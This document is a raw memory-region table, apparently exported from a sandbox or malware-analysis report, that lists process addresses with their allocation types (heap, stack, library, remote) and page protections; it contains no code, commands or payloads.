202BA480000
|
heap
|
page read and write
|
||
|
1F6FD9B0000
|
trusted library allocation
|
page read and write
|
||
|
1BBBC4DA000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
7FFB0BF7D000
|
unkown
|
page readonly
|
||
|
25E56572000
|
heap
|
page read and write
|
||
|
1BBBC47A000
|
trusted library allocation
|
page read and write
|
||
|
A1753FE000
|
stack
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
7FFAAB3E0000
|
trusted library allocation
|
page read and write
|
||
|
1BBB8C30000
|
heap
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
1FAB78E3000
|
heap
|
page read and write
|
||
|
202BA444000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA246000
|
heap
|
page read and write
|
||
|
202BE756000
|
trusted library allocation
|
page read and write
|
||
|
29D2CF22000
|
heap
|
page read and write
|
||
|
202BA466000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2CF18000
|
heap
|
page read and write
|
||
|
202BA499000
|
heap
|
page read and write
|
||
|
7FFAAB0EB000
|
trusted library allocation
|
page read and write
|
||
|
1BBD2BE3000
|
heap
|
page read and write
|
||
|
55C907D000
|
stack
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
21466FE000
|
unkown
|
page readonly
|
||
|
1BBB8B44000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
7FFAAB350000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBB89D0000
|
heap
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE9C3000
|
trusted library allocation
|
page read and write
|
||
|
202BA426000
|
heap
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
1F6F8D1A000
|
heap
|
page read and write
|
||
|
25E5893A000
|
trusted library allocation
|
page read and write
|
||
|
202BEA80000
|
trusted library allocation
|
page execute
|
||
|
1BBB8A15000
|
heap
|
page read and write
|
||
|
202BA448000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1FAB7700000
|
heap
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
7FFAAB281000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8B1000
|
heap
|
page read and write
|
||
|
202BE42B000
|
heap
|
page read and write
|
||
|
7FFAAC95D000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6F84AC000
|
heap
|
page read and write
|
||
|
202BE3EE000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
25E58340000
|
heap
|
page execute and read and write
|
||
|
29D2C8E6000
|
heap
|
page read and write
|
||
|
25E70633000
|
heap
|
page read and write
|
||
|
202BA446000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1FAB785D000
|
heap
|
page read and write
|
||
|
202BA432000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
25E56740000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2C8D4000
|
heap
|
page read and write
|
||
|
1F6FD9D0000
|
trusted library allocation
|
page read and write
|
||
|
55C94BC000
|
stack
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
7FFAAB28A000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202C0170000
|
heap
|
page read and write
|
||
|
7FFAAB270000
|
trusted library allocation
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFB0BF79000
|
unkown
|
page readonly
|
||
|
7FFAACA06000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAACB80000
|
trusted library allocation
|
page read and write
|
||
|
1F6FD9E0000
|
trusted library allocation
|
page read and write
|
||
|
202BA415000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA44C000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB3D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB01000
|
trusted library allocation
|
page read and write
|
||
|
55C8E7E000
|
stack
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202B9660000
|
trusted library allocation
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1D8C0000
|
unkown
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE417000
|
heap
|
page read and write
|
||
|
202BE75A000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBBC4F1000
|
trusted library allocation
|
page read and write
|
||
|
202BA3F2000
|
heap
|
page read and write
|
||
|
1F6FDAC3000
|
heap
|
page read and write
|
||
|
202BA448000
|
heap
|
page read and write
|
||
|
202BE58C000
|
trusted library allocation
|
page read and write
|
||
|
D78D97E000
|
stack
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE9C2000
|
trusted library allocation
|
page read and write
|
||
|
A175E4F000
|
stack
|
page read and write
|
||
|
202BE9D5000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE9DF000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2CDCE000
|
heap
|
page read and write
|
||
|
202BA499000
|
heap
|
page read and write
|
||
|
202B9660000
|
trusted library allocation
|
page read and write
|
||
|
1F6FD880000
|
trusted library allocation
|
page read and write
|
||
|
55C913F000
|
stack
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFAAB290000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
202BE38F000
|
heap
|
page read and write
|
||
|
202BA28D000
|
heap
|
page read and write
|
||
|
7FFAACA10000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA3EF000
|
heap
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
1BBB8B50000
|
trusted library allocation
|
page read and write
|
||
|
202BFE84000
|
trusted library allocation
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
1BBBBB0C000
|
trusted library allocation
|
page read and write
|
||
|
1FAB78E3000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1BBB8A70000
|
heap
|
page read and write
|
||
|
202B96C0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202B950A000
|
heap
|
page read and write
|
||
|
29D2C8A6000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2C830000
|
heap
|
page read and write
|
||
|
202BE41C000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
55C923D000
|
stack
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E58530000
|
heap
|
page execute and read and write
|
||
|
202BA422000
|
heap
|
page read and write
|
||
|
2146F7E000
|
stack
|
page read and write
|
||
|
7FFAAC954000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB360000
|
trusted library allocation
|
page read and write
|
||
|
1F6F8D1A000
|
heap
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
1BBD2BF8000
|
heap
|
page read and write
|
||
|
25E5659D000
|
heap
|
page read and write
|
||
|
55C91B7000
|
stack
|
page read and write
|
||
|
202BA440000
|
heap
|
page read and write
|
||
|
1BBCA831000
|
trusted library allocation
|
page read and write
|
||
|
202BE9CA000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BE41C000
|
heap
|
page read and write
|
||
|
202B9680000
|
trusted library allocation
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2B0000
|
heap
|
page read and write
|
||
|
29D2CDCA000
|
heap
|
page read and write
|
||
|
202BA3CB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
202BE43A000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBBA8B4000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
55C9F8D000
|
stack
|
page read and write
|
||
|
1BBBACDF000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1FAB78E3000
|
heap
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
B2DAAFF000
|
stack
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA256000
|
heap
|
page read and write
|
||
|
1BBBACDB000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BEA61000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A2000
|
heap
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
25E585DC000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1BBBADD6000
|
trusted library allocation
|
page read and write
|
||
|
25E565E6000
|
heap
|
page read and write
|
||
|
55C8EFD000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1FAB78DC000
|
heap
|
page read and write
|
||
|
202BE750000
|
trusted library allocation
|
page read and write
|
||
|
25E58652000
|
trusted library allocation
|
page read and write
|
||
|
25E565A5000
|
heap
|
page read and write
|
||
|
1BBB89B0000
|
heap
|
page read and write
|
||
|
202BA448000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6F9800000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
25E565BF000
|
heap
|
page read and write
|
||
|
7FFAACBC0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBCA9E6000
|
trusted library allocation
|
page read and write
|
||
|
202B9650000
|
trusted library allocation
|
page read and write
|
||
|
202BA44C000
|
heap
|
page read and write
|
||
|
202BA2BD000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202B9638000
|
trusted library allocation
|
page read and write
|
||
|
202BA420000
|
heap
|
page read and write
|
||
|
202BA256000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
29D2CF22000
|
heap
|
page read and write
|
||
|
7FFAACB32000
|
trusted library allocation
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
D78D57D000
|
stack
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1BBBACD0000
|
trusted library allocation
|
page read and write
|
||
|
25E58827000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
55C943F000
|
stack
|
page read and write
|
||
|
202BEA62000
|
trusted library allocation
|
page read and write
|
||
|
202BE58C000
|
trusted library allocation
|
page read and write
|
||
|
21478FE000
|
unkown
|
page readonly
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2DE000
|
heap
|
page read and write
|
||
|
1BBD2990000
|
heap
|
page read and write
|
||
|
202B95F5000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAACAF0000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8CD000
|
heap
|
page read and write
|
||
|
29D2C8E6000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFAACB40000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA3F5000
|
heap
|
page read and write
|
||
|
29D2C8B1000
|
heap
|
page read and write
|
||
|
202B94F9000
|
heap
|
page read and write
|
||
|
29D2C9A0000
|
heap
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE860000
|
trusted library allocation
|
page read and write
|
||
|
202BE743000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
55C93BE000
|
stack
|
page read and write
|
||
|
1F6FDC20000
|
remote allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202B9674000
|
trusted library allocation
|
page read and write
|
||
|
25E58541000
|
trusted library allocation
|
page read and write
|
||
|
202BE9DD000
|
trusted library allocation
|
page read and write
|
||
|
1F6F92D0000
|
trusted library section
|
page readonly
|
||
|
202BA2DB000
|
heap
|
page read and write
|
||
|
29D2CF17000
|
heap
|
page read and write
|
||
|
7FFAAB2A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25E565E8000
|
heap
|
page read and write
|
||
|
D78D67E000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
25E589EB000
|
trusted library allocation
|
page read and write
|
||
|
25E70750000
|
heap
|
page read and write
|
||
|
25E58662000
|
trusted library allocation
|
page read and write
|
||
|
202BE38A000
|
heap
|
page read and write
|
||
|
202BE757000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
29D2CDC5000
|
heap
|
page read and write
|
||
|
1FAB78E3000
|
heap
|
page read and write
|
||
|
202B95E8000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1FAB78D3000
|
heap
|
page read and write
|
||
|
7FFAACBE0000
|
trusted library allocation
|
page read and write
|
||
|
1BBBC61B000
|
trusted library allocation
|
page read and write
|
||
|
1F6FD8A0000
|
trusted library allocation
|
page read and write
|
||
|
1F6F83D0000
|
trusted library allocation
|
page read and write
|
||
|
202BEA20000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
202BA480000
|
heap
|
page read and write
|
||
|
202BA444000
|
heap
|
page read and write
|
||
|
25E7058D000
|
heap
|
page read and write
|
||
|
202BE40F000
|
heap
|
page read and write
|
||
|
7FFB0BF60000
|
unkown
|
page readonly
|
||
|
1F6F8471000
|
heap
|
page read and write
|
||
|
7FFAACB20000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAACA36000
|
trusted library allocation
|
page execute and read and write
|
||
|
7DF3FFAB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F6F82A0000
|
heap
|
page read and write
|
||
|
21473FE000
|
unkown
|
page readonly
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFAAB460000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE7C0000
|
trusted library allocation
|
page read and write
|
||
|
21476FE000
|
unkown
|
page readonly
|
||
|
202BE58C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1D8B6000
|
unkown
|
page readonly
|
||
|
202BA3B0000
|
remote allocation
|
page read and write
|
||
|
D78D4FF000
|
stack
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BDEE2000
|
trusted library allocation
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE41C000
|
heap
|
page read and write
|
||
|
1F6FD8D9000
|
trusted library allocation
|
page read and write
|
||
|
202BE8E0000
|
trusted library allocation
|
page read and write
|
||
|
25E566F5000
|
heap
|
page read and write
|
||
|
202BE9CB000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAAB450000
|
trusted library allocation
|
page read and write
|
||
|
202BE417000
|
heap
|
page read and write
|
||
|
202BEA67000
|
trusted library allocation
|
page read and write
|
||
|
25E56720000
|
trusted library allocation
|
page read and write
|
||
|
1FAB78B5000
|
heap
|
page read and write
|
||
|
7FFAACC10000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
D78D6FE000
|
stack
|
page read and write
|
||
|
7FFAAB0D3000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
7FFAACB0A000
|
trusted library allocation
|
page read and write
|
||
|
1FAB7820000
|
heap
|
page read and write
|
||
|
202BE75C000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA45B000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
25E7056A000
|
heap
|
page read and write
|
||
|
202BE940000
|
trusted library allocation
|
page execute
|
||
|
1F6FD8C0000
|
trusted library allocation
|
page read and write
|
||
|
1BBB89BE000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE40C000
|
heap
|
page read and write
|
||
|
1F6F8BC1000
|
trusted library allocation
|
page read and write
|
||
|
202BE382000
|
heap
|
page read and write
|
||
|
29D2C960000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
D78D879000
|
stack
|
page read and write
|
||
|
A17639B000
|
stack
|
page read and write
|
||
|
29D2CDC7000
|
heap
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA3FD000
|
heap
|
page read and write
|
||
|
25E70578000
|
heap
|
page read and write
|
||
|
7FFAAB2E0000
|
trusted library allocation
|
page read and write
|
||
|
202BE753000
|
trusted library allocation
|
page read and write
|
||
|
25E56680000
|
heap
|
page read and write
|
||
|
202BE3C4000
|
heap
|
page read and write
|
||
|
D78D1DE000
|
stack
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BE761000
|
trusted library allocation
|
page read and write
|
||
|
202BE960000
|
heap
|
page readonly
|
||
|
1F6F8E01000
|
trusted library allocation
|
page read and write
|
||
|
202BE409000
|
heap
|
page read and write
|
||
|
202BA422000
|
heap
|
page read and write
|
||
|
202BE9D9000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
214707E000
|
stack
|
page read and write
|
||
|
2147AFE000
|
stack
|
page read and write
|
||
|
2146EFE000
|
unkown
|
page readonly
|
||
|
29D2C89F000
|
heap
|
page read and write
|
||
|
1FAB79EE000
|
heap
|
page read and write
|
||
|
202BE3C8000
|
heap
|
page read and write
|
||
|
202BE332000
|
heap
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
1BBB8880000
|
heap
|
page read and write
|
||
|
202BA461000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
1FAB782E000
|
heap
|
page read and write
|
||
|
25E685B2000
|
trusted library allocation
|
page read and write
|
||
|
202BA289000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBD2A90000
|
heap
|
page read and write
|
||
|
1FAB79E0000
|
heap
|
page read and write
|
||
|
1BBBA7F0000
|
heap
|
page execute and read and write
|
||
|
202BE332000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1FAB77E0000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
1BBD2A1F000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE75E000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBD2C07000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BE3C8000
|
heap
|
page read and write
|
||
|
202BA290000
|
heap
|
page read and write
|
||
|
202C0174000
|
heap
|
page read and write
|
||
|
1FAB7800000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB186000
|
trusted library allocation
|
page read and write
|
||
|
202BE384000
|
heap
|
page read and write
|
||
|
1BBB8C10000
|
heap
|
page execute and read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE438000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1BBB8B30000
|
heap
|
page readonly
|
||
|
1F6F84FE000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1FAB7848000
|
heap
|
page read and write
|
||
|
202BA448000
|
heap
|
page read and write
|
||
|
7FFAAB380000
|
trusted library allocation
|
page read and write
|
||
|
202BA47F000
|
heap
|
page read and write
|
||
|
202BA446000
|
heap
|
page read and write
|
||
|
1BBB8C34000
|
heap
|
page read and write
|
||
|
29D2CA0A000
|
heap
|
page read and write
|
||
|
202BA44A000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA3E0000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
29D2CA05000
|
heap
|
page read and write
|
||
|
7DF454F50000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2BC000
|
heap
|
page read and write
|
||
|
B2DAA7E000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6F8C00000
|
heap
|
page read and write
|
||
|
202BA480000
|
heap
|
page read and write
|
||
|
7FFB1D8C5000
|
unkown
|
page readonly
|
||
|
29D2C980000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8D4000
|
heap
|
page read and write
|
||
|
202BE800000
|
trusted library allocation
|
page read and write
|
||
|
1F6F8D02000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1F6FD860000
|
trusted library allocation
|
page read and write
|
||
|
202BE749000
|
trusted library allocation
|
page read and write
|
||
|
202BA2DE000
|
heap
|
page read and write
|
||
|
7FFAAB12C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFAACB60000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BA444000
|
heap
|
page read and write
|
||
|
1BBD2A05000
|
heap
|
page read and write
|
||
|
55C8BCE000
|
stack
|
page read and write
|
||
|
7FFAAB2F0000
|
trusted library allocation
|
page read and write
|
||
|
1F6FDB0A000
|
heap
|
page read and write
|
||
|
202BA446000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1F6F8413000
|
heap
|
page read and write
|
||
|
2146AFE000
|
unkown
|
page readonly
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE743000
|
trusted library allocation
|
page read and write
|
||
|
202BE749000
|
trusted library allocation
|
page read and write
|
||
|
1BBB8B80000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BE752000
|
trusted library allocation
|
page read and write
|
||
|
202BA444000
|
heap
|
page read and write
|
||
|
202B97A0000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E566B0000
|
heap
|
page read and write
|
||
|
7FFB16790000
|
unkown
|
page readonly
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA422000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE409000
|
heap
|
page read and write
|
||
|
A175D4E000
|
stack
|
page read and write
|
||
|
214797E000
|
stack
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BE5D0000
|
heap
|
page read and write
|
||
|
1FAB78D7000
|
heap
|
page read and write
|
||
|
29D2CA00000
|
heap
|
page read and write
|
||
|
202BE42A000
|
heap
|
page read and write
|
||
|
1BBB8B40000
|
heap
|
page read and write
|
||
|
21465F7000
|
stack
|
page read and write
|
||
|
202BA256000
|
heap
|
page read and write
|
||
|
55C9F0E000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BFE8C000
|
trusted library allocation
|
page read and write
|
||
|
202BA484000
|
heap
|
page read and write
|
||
|
202BEA31000
|
trusted library allocation
|
page read and write
|
||
|
29D2CDC4000
|
heap
|
page read and write
|
||
|
202BA462000
|
heap
|
page read and write
|
||
|
1F6FD881000
|
trusted library allocation
|
page read and write
|
||
|
A1752C7000
|
stack
|
page read and write
|
||
|
202BA3CD000
|
heap
|
page read and write
|
||
|
7FFAAC953000
|
trusted library allocation
|
page execute and read and write
|
||
|
21471FE000
|
unkown
|
page readonly
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
21480FE000
|
unkown
|
page readonly
|
||
|
202B965C000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202C0010000
|
trusted library allocation
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BA436000
|
heap
|
page read and write
|
||
|
214737E000
|
stack
|
page read and write
|
||
|
29D2C8D2000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
25E56780000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1F6F8D13000
|
heap
|
page read and write
|
||
|
1FAB78D7000
|
heap
|
page read and write
|
||
|
29D2C897000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
202BA29D000
|
heap
|
page read and write
|
||
|
7FFAACBA0000
